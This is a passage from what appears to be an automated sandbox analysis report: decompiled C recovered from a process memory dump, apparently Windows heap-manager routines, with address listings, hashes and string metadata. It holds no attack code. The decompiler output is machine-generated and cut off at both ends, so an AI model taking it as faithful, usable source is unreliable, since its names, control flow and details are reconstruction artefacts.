                                                                                                                          									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                                                                                                                          									_t491 = _t394;
                                                                                                                          									 *_t533 = _t394;
                                                                                                                          									__eflags =  *0xab8748 - 1; // 0x0
                                                                                                                          									if(__eflags >= 0) {
                                                                                                                          										__eflags = _t491 - 1;
                                                                                                                          										if(_t491 <= 1) {
                                                                                                                          											_t404 =  *[fs:0x30];
                                                                                                                          											__eflags =  *(_t404 + 0xc);
                                                                                                                          											if( *(_t404 + 0xc) == 0) {
                                                                                                                          												_push("HEAP: ");
                                                                                                                          												E009CB150();
                                                                                                                          											} else {
                                                                                                                          												E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          											}
                                                                                                                          											_push("((LONG)FreeEntry->Size > 1)");
                                                                                                                          											E009CB150();
                                                                                                                          											_pop(_t491);
                                                                                                                          											__eflags =  *0xab7bc8 - _t449; // 0x0
                                                                                                                          											if(__eflags == 0) {
                                                                                                                          												__eflags = 0;
                                                                                                                          												_t491 = 1;
                                                                                                                          												E00A82073(_t449, 1, _t541, 0);
                                                                                                                          											}
                                                                                                                          											_t533 = _v32;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          									_t533[1] = _t449;
                                                                                                                          									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                                                                                                          									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                                                                                                                          										_t402 = (_t533 - _t541 >> 0x10) + 1;
                                                                                                                          										_v16 = _t402;
                                                                                                                          										__eflags = _t402 - 0xfe;
                                                                                                                          										if(_t402 >= 0xfe) {
                                                                                                                          											_push(_t491);
                                                                                                                          											_push(_t449);
                                                                                                                          											E00A8A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                                                                                                                          											_t533 = _v48;
                                                                                                                          											_t402 = _v32;
                                                                                                                          										}
                                                                                                                          										_t449 = _t402;
                                                                                                                          									}
                                                                                                                          									_t533[3] = _t449;
                                                                                                                          									E009EA830(_t553, _t533,  *_t533 & 0x0000ffff);
                                                                                                                          									_t447 = 0x7ffe0380;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							_t367 = E009E7D50();
                                                                                                                          							__eflags = _t367;
                                                                                                                          							if(_t367 != 0) {
                                                                                                                          								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                          							} else {
                                                                                                                          								_t370 = _t447;
                                                                                                                          							}
                                                                                                                          							__eflags =  *_t370;
                                                                                                                          							if( *_t370 != 0) {
                                                                                                                          								_t371 =  *[fs:0x30];
                                                                                                                          								__eflags =  *(_t371 + 0x240) & 1;
                                                                                                                          								if(( *(_t371 + 0x240) & 1) != 0) {
                                                                                                                          									__eflags = E009E7D50();
                                                                                                                          									if(__eflags != 0) {
                                                                                                                          										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                          										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                          									}
                                                                                                                          									E00A81411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							_t372 = E009E7D50();
                                                                                                                          							_t546 = 0x7ffe038a;
                                                                                                                          							_t446 = 0x230;
                                                                                                                          							__eflags = _t372;
                                                                                                                          							if(_t372 != 0) {
                                                                                                                          								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                                          							} else {
                                                                                                                          								_t246 = 0x7ffe038a;
                                                                                                                          							}
                                                                                                                          							__eflags =  *_t246;
                                                                                                                          							if( *_t246 == 0) {
                                                                                                                          								goto L7;
                                                                                                                          							} else {
                                                                                                                          								__eflags = E009E7D50();
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                                                                                                                          									__eflags = _t546;
                                                                                                                          								}
                                                                                                                          								_push( *_t546 & 0x000000ff);
                                                                                                                          								_push(_v36);
                                                                                                                          								_push(_v40);
                                                                                                                          								goto L120;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						L19:
                                                                                                                          						_t31 = _t513 + 0x101f; // 0x101f
                                                                                                                          						_t455 = _t31 & 0xfffff000;
                                                                                                                          						_t32 = _t513 + 0x28; // 0x28
                                                                                                                          						_v44 = _t455;
                                                                                                                          						__eflags = _t455 - _t32;
                                                                                                                          						if(_t455 == _t32) {
                                                                                                                          							_t455 = _t455 + 0x1000;
                                                                                                                          							_v44 = _t455;
                                                                                                                          						}
                                                                                                                          						_t265 = _t445 << 3;
                                                                                                                          						_v24 = _t265;
                                                                                                                          						_t266 = _t265 + _t513;
                                                                                                                          						__eflags = _v40;
                                                                                                                          						_v20 = _t266;
                                                                                                                          						if(_v40 == 0) {
                                                                                                                          							_t266 = _t266 + 0xfffffff0;
                                                                                                                          							__eflags = _t266;
                                                                                                                          						}
                                                                                                                          						_t267 = _t266 & 0xfffff000;
                                                                                                                          						_v52 = _t267;
                                                                                                                          						__eflags = _t267 - _t455;
                                                                                                                          						if(_t267 < _t455) {
                                                                                                                          							__eflags =  *0xab8748 - 1; // 0x0
                                                                                                                          							if(__eflags < 0) {
                                                                                                                          								L9:
                                                                                                                          								_t450 = _t553;
                                                                                                                          								L10:
                                                                                                                          								_push(_t445);
                                                                                                                          								goto L11;
                                                                                                                          							}
                                                                                                                          							__eflags = _v40;
                                                                                                                          							L146:
                                                                                                                          							if(__eflags == 0) {
                                                                                                                          								goto L9;
                                                                                                                          							}
                                                                                                                          							_t270 =  *[fs:0x30];
                                                                                                                          							__eflags =  *(_t270 + 0xc);
                                                                                                                          							if( *(_t270 + 0xc) == 0) {
                                                                                                                          								_push("HEAP: ");
                                                                                                                          								E009CB150();
                                                                                                                          							} else {
                                                                                                                          								E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          							}
                                                                                                                          							_push("(!TrailingUCR)");
                                                                                                                          							E009CB150();
                                                                                                                          							__eflags =  *0xab7bc8;
                                                                                                                          							if( *0xab7bc8 == 0) {
                                                                                                                          								__eflags = 0;
                                                                                                                          								E00A82073(_t445, 1, _t541, 0);
                                                                                                                          							}
                                                                                                                          							L152:
                                                                                                                          							_t445 = _a4;
                                                                                                                          							L153:
                                                                                                                          							_t513 = _v48;
                                                                                                                          							goto L9;
                                                                                                                          						}
                                                                                                                          						_v32 = _t267;
                                                                                                                          						_t280 = _t267 - _t455;
                                                                                                                          						_v32 = _v32 - _t455;
                                                                                                                          						__eflags = _a8;
                                                                                                                          						_t460 = _v32;
                                                                                                                          						_v52 = _t460;
                                                                                                                          						if(_a8 != 0) {
                                                                                                                          							L27:
                                                                                                                          							__eflags = _t280;
                                                                                                                          							if(_t280 == 0) {
                                                                                                                          								L33:
                                                                                                                          								_t446 = 0;
                                                                                                                          								__eflags = _v40;
                                                                                                                          								if(_v40 == 0) {
                                                                                                                          									_t468 = _v44 + _v52;
                                                                                                                          									_v36 = _t468;
                                                                                                                          									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                                                                                                                          									__eflags = _v20 - _v52 + _v44;
                                                                                                                          									if(_v20 == _v52 + _v44) {
                                                                                                                          										__eflags =  *(_t553 + 0x4c);
                                                                                                                          										if( *(_t553 + 0x4c) != 0) {
                                                                                                                          											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                                                                                                                          											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										_t468[3] = 0;
                                                                                                                          										_t468[1] = 0;
                                                                                                                          										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                                                                                                                          										_t521 = _t317;
                                                                                                                          										 *_t468 = _t317;
                                                                                                                          										__eflags =  *0xab8748 - 1; // 0x0
                                                                                                                          										if(__eflags >= 0) {
                                                                                                                          											__eflags = _t521 - 1;
                                                                                                                          											if(_t521 <= 1) {
                                                                                                                          												_t327 =  *[fs:0x30];
                                                                                                                          												__eflags =  *(_t327 + 0xc);
                                                                                                                          												if( *(_t327 + 0xc) == 0) {
                                                                                                                          													_push("HEAP: ");
                                                                                                                          													E009CB150();
                                                                                                                          												} else {
                                                                                                                          													E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          												}
                                                                                                                          												_push("(LONG)FreeEntry->Size > 1");
                                                                                                                          												E009CB150();
                                                                                                                          												__eflags =  *0xab7bc8 - _t446; // 0x0
                                                                                                                          												if(__eflags == 0) {
                                                                                                                          													__eflags = 1;
                                                                                                                          													E00A82073(_t446, 1, _t541, 1);
                                                                                                                          												}
                                                                                                                          												_t468 = _v36;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          										_t468[1] = _t446;
                                                                                                                          										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                                                                                                                          										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                                                                                                          										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                                                                                                                          											_t320 = _t446;
                                                                                                                          										} else {
                                                                                                                          											_t320 = (_t468 - _t541 >> 0x10) + 1;
                                                                                                                          											_v12 = _t320;
                                                                                                                          											__eflags = _t320 - 0xfe;
                                                                                                                          											if(_t320 >= 0xfe) {
                                                                                                                          												_push(_t468);
                                                                                                                          												_push(_t446);
                                                                                                                          												E00A8A80D(_t522, 3, _t468, _t541);
                                                                                                                          												_t468 = _v52;
                                                                                                                          												_t320 = _v28;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          										_t468[3] = _t320;
                                                                                                                          										E009EA830(_t553, _t468,  *_t468 & 0x0000ffff);
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								E009EB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                                                                                                                          								E009EA830(_t553, _v64, _v24);
                                                                                                                          								_t286 = E009E7D50();
                                                                                                                          								_t542 = 0x7ffe0380;
                                                                                                                          								__eflags = _t286;
                                                                                                                          								if(_t286 != 0) {
                                                                                                                          									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                          								} else {
                                                                                                                          									_t289 = 0x7ffe0380;
                                                                                                                          								}
                                                                                                                          								__eflags =  *_t289;
                                                                                                                          								if( *_t289 != 0) {
                                                                                                                          									_t290 =  *[fs:0x30];
                                                                                                                          									__eflags =  *(_t290 + 0x240) & 1;
                                                                                                                          									if(( *(_t290 + 0x240) & 1) != 0) {
                                                                                                                          										__eflags = E009E7D50();
                                                                                                                          										if(__eflags != 0) {
                                                                                                                          											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                          											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                          										}
                                                                                                                          										E00A81411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								_t291 = E009E7D50();
                                                                                                                          								_t543 = 0x7ffe038a;
                                                                                                                          								__eflags = _t291;
                                                                                                                          								if(_t291 != 0) {
                                                                                                                          									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                                          								} else {
                                                                                                                          									_t246 = 0x7ffe038a;
                                                                                                                          								}
                                                                                                                          								__eflags =  *_t246;
                                                                                                                          								if( *_t246 != 0) {
                                                                                                                          									__eflags = E009E7D50();
                                                                                                                          									if(__eflags != 0) {
                                                                                                                          										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                                          										__eflags = _t543;
                                                                                                                          									}
                                                                                                                          									_push( *_t543 & 0x000000ff);
                                                                                                                          									_push(_t446);
                                                                                                                          									_push(_t446);
                                                                                                                          									L120:
                                                                                                                          									_push( *(_t553 + 0x74) << 3);
                                                                                                                          									_push(_v52);
                                                                                                                          									_t246 = E00A81411(_t446, _t553, _v44, __eflags);
                                                                                                                          								}
                                                                                                                          								goto L7;
                                                                                                                          							}
                                                                                                                          							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                                                                                                          							_t339 = E009F174B( &_v44,  &_v52, 0x4000);
                                                                                                                          							__eflags = _t339;
                                                                                                                          							if(_t339 < 0) {
                                                                                                                          								L94:
                                                                                                                          								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                                                                                                                          								__eflags = _v40;
                                                                                                                          								if(_v40 == 0) {
                                                                                                                          									goto L153;
                                                                                                                          								}
                                                                                                                          								E009EB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                                                                                                                          								goto L152;
                                                                                                                          							}
                                                                                                                          							_t344 = E009E7D50();
                                                                                                                          							__eflags = _t344;
                                                                                                                          							if(_t344 != 0) {
                                                                                                                          								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                          							} else {
                                                                                                                          								_t347 = 0x7ffe0380;
                                                                                                                          							}
                                                                                                                          							__eflags =  *_t347;
                                                                                                                          							if( *_t347 != 0) {
                                                                                                                          								_t348 =  *[fs:0x30];
                                                                                                                          								__eflags =  *(_t348 + 0x240) & 1;
                                                                                                                          								if(( *(_t348 + 0x240) & 1) != 0) {
                                                                                                                          									E00A814FB(_t445, _t553, _v44, _v52, 6);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							_t513 = _v48;
                                                                                                                          							goto L33;
                                                                                                                          						}
                                                                                                                          						__eflags =  *_v12 - 3;
                                                                                                                          						_t513 = _v48;
                                                                                                                          						if( *_v12 == 3) {
                                                                                                                          							goto L27;
                                                                                                                          						}
                                                                                                                          						__eflags = _t460;
                                                                                                                          						if(_t460 == 0) {
                                                                                                                          							goto L9;
                                                                                                                          						}
                                                                                                                          						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                                                                                                                          						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                                                                                                                          							goto L9;
                                                                                                                          						}
                                                                                                                          						goto L27;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t445 = _a4;
                                                                                                                          				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                                                                                                                          					_t513 = __edx;
                                                                                                                          					goto L10;
                                                                                                                          				}
                                                                                                                          				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                                                                                                                          				_v20 = _t433;
                                                                                                                          				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                                                                                                                          					_t513 = _t539;
                                                                                                                          					goto L9;
                                                                                                                          				} else {
                                                                                                                          					_t437 = E009E99BF(__ecx, __edx,  &_a4, 0);
                                                                                                                          					_t445 = _a4;
                                                                                                                          					_t514 = _t437;
                                                                                                                          					_v56 = _t514;
                                                                                                                          					if(_t445 - 0x201 > 0xfbff) {
                                                                                                                          						goto L14;
                                                                                                                          					} else {
                                                                                                                          						E009EA830(__ecx, _t514, _t445);
                                                                                                                          						_t506 =  *(_t553 + 0x238);
                                                                                                                          						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                                                                                                                          						_t246 = _t506 >> 4;
                                                                                                                          						if(_t551 < _t506 - _t246) {
                                                                                                                          							_t508 =  *(_t553 + 0x23c);
                                                                                                                          							_t246 = _t508 >> 2;
                                                                                                                          							__eflags = _t551 - _t508 - _t246;
                                                                                                                          							if(_t551 > _t508 - _t246) {
                                                                                                                          								_t246 = E009FABD8(_t553);
                                                                                                                          								 *(_t553 + 0x23c) = _t551;
                                                                                                                          								 *(_t553 + 0x238) = _t551;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L7;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}



















































































                                                                                                                          0x00a31fcb
                                                                                                                          0x00a31fcf
                                                                                                                          0x00a31fdd
                                                                                                                          0x00a31fe3
                                                                                                                          0x00a31fe3
                                                                                                                          0x009ea724
                                                                                                                          0x009ea728
                                                                                                                          0x009ea72a
                                                                                                                          0x009ea72d
                                                                                                                          0x009ea737
                                                                                                                          0x009ea73a
                                                                                                                          0x009ea73c
                                                                                                                          0x009ea742
                                                                                                                          0x009ea748
                                                                                                                          0x00a31f4d
                                                                                                                          0x00a31f50
                                                                                                                          0x00a31f56
                                                                                                                          0x00a31f5c
                                                                                                                          0x00a31f5f
                                                                                                                          0x00a31f7e
                                                                                                                          0x00a31f83
                                                                                                                          0x00a31f61
                                                                                                                          0x00a31f76
                                                                                                                          0x00a31f7b
                                                                                                                          0x00a31f89
                                                                                                                          0x00a31f8e
                                                                                                                          0x00a31f93
                                                                                                                          0x00a31f94
                                                                                                                          0x00a31f9a
                                                                                                                          0x00a31f9c
                                                                                                                          0x00a31f9e
                                                                                                                          0x00a31fa1
                                                                                                                          0x00a31fa1
                                                                                                                          0x00a31fa6
                                                                                                                          0x00a31fa6
                                                                                                                          0x00a31f50
                                                                                                                          0x009ea74e
                                                                                                                          0x009ea751
                                                                                                                          0x009ea754
                                                                                                                          0x009ea75d
                                                                                                                          0x009ea75e
                                                                                                                          0x009ea762
                                                                                                                          0x009ea767
                                                                                                                          0x00a31faf
                                                                                                                          0x00a31fb0
                                                                                                                          0x00a31fb9
                                                                                                                          0x00a31fbe
                                                                                                                          0x00a31fc2
                                                                                                                          0x00a31fc2
                                                                                                                          0x009ea76d
                                                                                                                          0x009ea76d
                                                                                                                          0x009ea775
                                                                                                                          0x009ea778
                                                                                                                          0x009ea77d
                                                                                                                          0x009ea77d
                                                                                                                          0x009ea71e
                                                                                                                          0x009ea782
                                                                                                                          0x009ea787
                                                                                                                          0x009ea789
                                                                                                                          0x00a31ff3
                                                                                                                          0x009ea78f
                                                                                                                          0x009ea78f
                                                                                                                          0x009ea78f
                                                                                                                          0x009ea791
                                                                                                                          0x009ea794
                                                                                                                          0x00a31ffd
                                                                                                                          0x00a32006
                                                                                                                          0x00a3200c
                                                                                                                          0x00a32017
                                                                                                                          0x00a32019
                                                                                                                          0x00a32024
                                                                                                                          0x00a32024
                                                                                                                          0x00a32024
                                                                                                                          0x00a32047
                                                                                                                          0x00a32047
                                                                                                                          0x00a3200c
                                                                                                                          0x009ea79a
                                                                                                                          0x009ea79f
                                                                                                                          0x009ea7a4
                                                                                                                          0x009ea7a9
                                                                                                                          0x009ea7ab
                                                                                                                          0x00a3205a
                                                                                                                          0x009ea7b1
                                                                                                                          0x009ea7b1
                                                                                                                          0x009ea7b1
                                                                                                                          0x009ea7b3
                                                                                                                          0x009ea7b6
                                                                                                                          0x00000000
                                                                                                                          0x009ea7bc
                                                                                                                          0x00a32066
                                                                                                                          0x00a32068
                                                                                                                          0x00a32073
                                                                                                                          0x00a32073
                                                                                                                          0x00a32073
                                                                                                                          0x00a32078
                                                                                                                          0x00a32079
                                                                                                                          0x00a3207d
                                                                                                                          0x00000000
                                                                                                                          0x00a3207d
                                                                                                                          0x009ea7b6
                                                                                                                          0x009ea440
                                                                                                                          0x009ea440
                                                                                                                          0x009ea440
                                                                                                                          0x009ea446
                                                                                                                          0x009ea44c
                                                                                                                          0x009ea44f
                                                                                                                          0x009ea453
                                                                                                                          0x009ea455
                                                                                                                          0x00a320b3
                                                                                                                          0x00a320b9
                                                                                                                          0x00a320b9
                                                                                                                          0x009ea45d
                                                                                                                          0x009ea460
                                                                                                                          0x009ea464
                                                                                                                          0x009ea466
                                                                                                                          0x009ea46b
                                                                                                                          0x009ea46f
                                                                                                                          0x009ea471
                                                                                                                          0x009ea471
                                                                                                                          0x009ea471
                                                                                                                          0x009ea474
                                                                                                                          0x009ea479
                                                                                                                          0x009ea47d
                                                                                                                          0x009ea47f
                                                                                                                          0x00a32229
                                                                                                                          0x00a3222f
                                                                                                                          0x009ea3c8
                                                                                                                          0x009ea3c8
                                                                                                                          0x009ea3ca
                                                                                                                          0x009ea3ca
                                                                                                                          0x00000000
                                                                                                                          0x009ea3ca
                                                                                                                          0x00a32235
                                                                                                                          0x00a3223a
                                                                                                                          0x00a3223a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32240
                                                                                                                          0x00a32246
                                                                                                                          0x00a3224a
                                                                                                                          0x00a32269
                                                                                                                          0x00a3226e
                                                                                                                          0x00a3224c
                                                                                                                          0x00a32261
                                                                                                                          0x00a32266
                                                                                                                          0x00a32274
                                                                                                                          0x00a32279
                                                                                                                          0x00a3227e
                                                                                                                          0x00a32286
                                                                                                                          0x00a32288
                                                                                                                          0x00a3228d
                                                                                                                          0x00a3228d
                                                                                                                          0x00a32292
                                                                                                                          0x00a32292
                                                                                                                          0x00a32295
                                                                                                                          0x00a32295
                                                                                                                          0x00000000
                                                                                                                          0x00a32295
                                                                                                                          0x009ea485
                                                                                                                          0x009ea489
                                                                                                                          0x009ea48b
                                                                                                                          0x009ea48f
                                                                                                                          0x009ea493
                                                                                                                          0x009ea497
                                                                                                                          0x009ea49b
                                                                                                                          0x009ea4bb
                                                                                                                          0x009ea4bb
                                                                                                                          0x009ea4bd
                                                                                                                          0x009ea4ff
                                                                                                                          0x009ea4ff
                                                                                                                          0x009ea501
                                                                                                                          0x009ea505
                                                                                                                          0x009ea50f
                                                                                                                          0x009ea517
                                                                                                                          0x009ea51b
                                                                                                                          0x009ea527
                                                                                                                          0x009ea52b
                                                                                                                          0x00a32182
                                                                                                                          0x00a32185
                                                                                                                          0x00a32193
                                                                                                                          0x00a32199
                                                                                                                          0x00a32199
                                                                                                                          0x009ea531
                                                                                                                          0x009ea535
                                                                                                                          0x009ea538
                                                                                                                          0x009ea548
                                                                                                                          0x009ea54b
                                                                                                                          0x009ea54d
                                                                                                                          0x009ea553
                                                                                                                          0x009ea559
                                                                                                                          0x00a32100
                                                                                                                          0x00a32103
                                                                                                                          0x00a32109
                                                                                                                          0x00a3210f
                                                                                                                          0x00a32112
                                                                                                                          0x00a32131
                                                                                                                          0x00a32136
                                                                                                                          0x00a32114
                                                                                                                          0x00a32129
                                                                                                                          0x00a3212e
                                                                                                                          0x00a3213c
                                                                                                                          0x00a32141
                                                                                                                          0x00a32147
                                                                                                                          0x00a3214d
                                                                                                                          0x00a32151
                                                                                                                          0x00a32154
                                                                                                                          0x00a32154
                                                                                                                          0x00a32159
                                                                                                                          0x00a32159

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                          • API String ID: 0-523794902
                                                                                                                          • Opcode ID: 8ca70851e4219b4e78527a1c61df406e3aad0fc4203b7eb28316b508325a900c
                                                                                                                          • Instruction ID: 496b60f66cc96fdd56f738a0c4cdf910d15c2bb7f86bb08d4c9a6a26a9c8d55e
                                                                                                                          • Opcode Fuzzy Hash: 8ca70851e4219b4e78527a1c61df406e3aad0fc4203b7eb28316b508325a900c
                                                                                                                          • Instruction Fuzzy Hash: 4642AE316087819FC716DF29C884B6ABBE5BF88704F18496DF4868B362D734ED85CB52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 64%
                                                                                                                          			E00A82D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                          				signed int _t83;
                                                                                                                          				signed char _t89;
                                                                                                                          				intOrPtr _t90;
                                                                                                                          				signed char _t101;
                                                                                                                          				signed int _t102;
                                                                                                                          				intOrPtr _t104;
                                                                                                                          				signed int _t105;
                                                                                                                          				signed int _t106;
                                                                                                                          				intOrPtr _t108;
                                                                                                                          				intOrPtr _t112;
                                                                                                                          				short* _t130;
                                                                                                                          				short _t131;
                                                                                                                          				signed int _t148;
                                                                                                                          				intOrPtr _t149;
                                                                                                                          				signed int* _t154;
                                                                                                                          				short* _t165;
                                                                                                                          				signed int _t171;
                                                                                                                          				void* _t182;
                                                                                                                          
                                                                                                                          				_push(0x44);
                                                                                                                          				_push(0xaa0e80);
                                                                                                                          				E00A1D0E8(__ebx, __edi, __esi);
                                                                                                                          				_t177 = __edx;
                                                                                                                          				_t181 = __ecx;
                                                                                                                          				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
                                                                                                                          				 *((char*)(_t182 - 0x1d)) = 0;
                                                                                                                          				 *(_t182 - 0x24) = 0;
                                                                                                                          				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                                                                                                          					 *((intOrPtr*)(_t182 - 4)) = 0;
                                                                                                                          					 *((intOrPtr*)(_t182 - 4)) = 1;
                                                                                                                          					_t83 = E009C40E1("RtlAllocateHeap");
                                                                                                                          					__eflags = _t83;
                                                                                                                          					if(_t83 == 0) {
                                                                                                                          						L48:
                                                                                                                          						 *(_t182 - 0x24) = 0;
                                                                                                                          						L49:
                                                                                                                          						 *((intOrPtr*)(_t182 - 4)) = 0;
                                                                                                                          						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
                                                                                                                          						E00A830C4();
                                                                                                                          						goto L50;
                                                                                                                          					}
                                                                                                                          					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
                                                                                                                          					 *(_t182 - 0x28) = _t89;
                                                                                                                          					 *(_t182 - 0x3c) = _t89;
                                                                                                                          					_t177 =  *(_t182 + 8);
                                                                                                                          					__eflags = _t177;
                                                                                                                          					if(_t177 == 0) {
                                                                                                                          						_t171 = 1;
                                                                                                                          						__eflags = 1;
                                                                                                                          					} else {
                                                                                                                          						_t171 = _t177;
                                                                                                                          					}
                                                                                                                          					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
                                                                                                                          					__eflags = _t148 - 0x10;
                                                                                                                          					if(_t148 < 0x10) {
                                                                                                                          						_t148 = 0x10;
                                                                                                                          					}
                                                                                                                          					_t149 = _t148 + 8;
                                                                                                                          					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
                                                                                                                          					__eflags = _t149 - _t177;
                                                                                                                          					if(_t149 < _t177) {
                                                                                                                          						L44:
                                                                                                                          						_t90 =  *[fs:0x30];
                                                                                                                          						__eflags =  *(_t90 + 0xc);
                                                                                                                          						if( *(_t90 + 0xc) == 0) {
                                                                                                                          							_push("HEAP: ");
                                                                                                                          							E009CB150();
                                                                                                                          						} else {
                                                                                                                          							E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          						}
                                                                                                                          						_push( *((intOrPtr*)(_t181 + 0x78)));
                                                                                                                          						E009CB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
                                                                                                                          						goto L48;
                                                                                                                          					} else {
                                                                                                                          						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
                                                                                                                          						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
                                                                                                                          							goto L44;
                                                                                                                          						}
                                                                                                                          						__eflags = _t89 & 0x00000001;
                                                                                                                          						if((_t89 & 0x00000001) != 0) {
                                                                                                                          							_t178 =  *(_t182 - 0x28);
                                                                                                                          						} else {
                                                                                                                          							E009DEEF0( *((intOrPtr*)(_t181 + 0xc8)));
                                                                                                                          							 *((char*)(_t182 - 0x1d)) = 1;
                                                                                                                          							_t178 =  *(_t182 - 0x28) | 0x00000001;
                                                                                                                          							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
                                                                                                                          						}
                                                                                                                          						E00A84496(_t181, 0);
                                                                                                                          						_t177 = L009E4620(_t181, _t181, _t178,  *(_t182 + 8));
                                                                                                                          						 *(_t182 - 0x24) = _t177;
                                                                                                                          						_t173 = 1;
                                                                                                                          						E00A849A4(_t181);
                                                                                                                          						__eflags = _t177;
                                                                                                                          						if(_t177 == 0) {
                                                                                                                          							goto L49;
                                                                                                                          						} else {
                                                                                                                          							_t177 = _t177 + 0xfffffff8;
                                                                                                                          							__eflags =  *((char*)(_t177 + 7)) - 5;
                                                                                                                          							if( *((char*)(_t177 + 7)) == 5) {
                                                                                                                          								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
                                                                                                                          								__eflags = _t177;
                                                                                                                          							}
                                                                                                                          							_t154 = _t177;
                                                                                                                          							 *(_t182 - 0x40) = _t177;
                                                                                                                          							__eflags =  *(_t181 + 0x4c);
                                                                                                                          							if( *(_t181 + 0x4c) != 0) {
                                                                                                                          								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                                                                                                          								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									_push(_t154);
                                                                                                                          									_t173 = _t177;
                                                                                                                          									E00A7FA2B(0, _t181, _t177, _t177, _t181, __eflags);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							__eflags =  *(_t177 + 2) & 0x00000002;
                                                                                                                          							if(( *(_t177 + 2) & 0x00000002) == 0) {
                                                                                                                          								_t101 =  *(_t177 + 3);
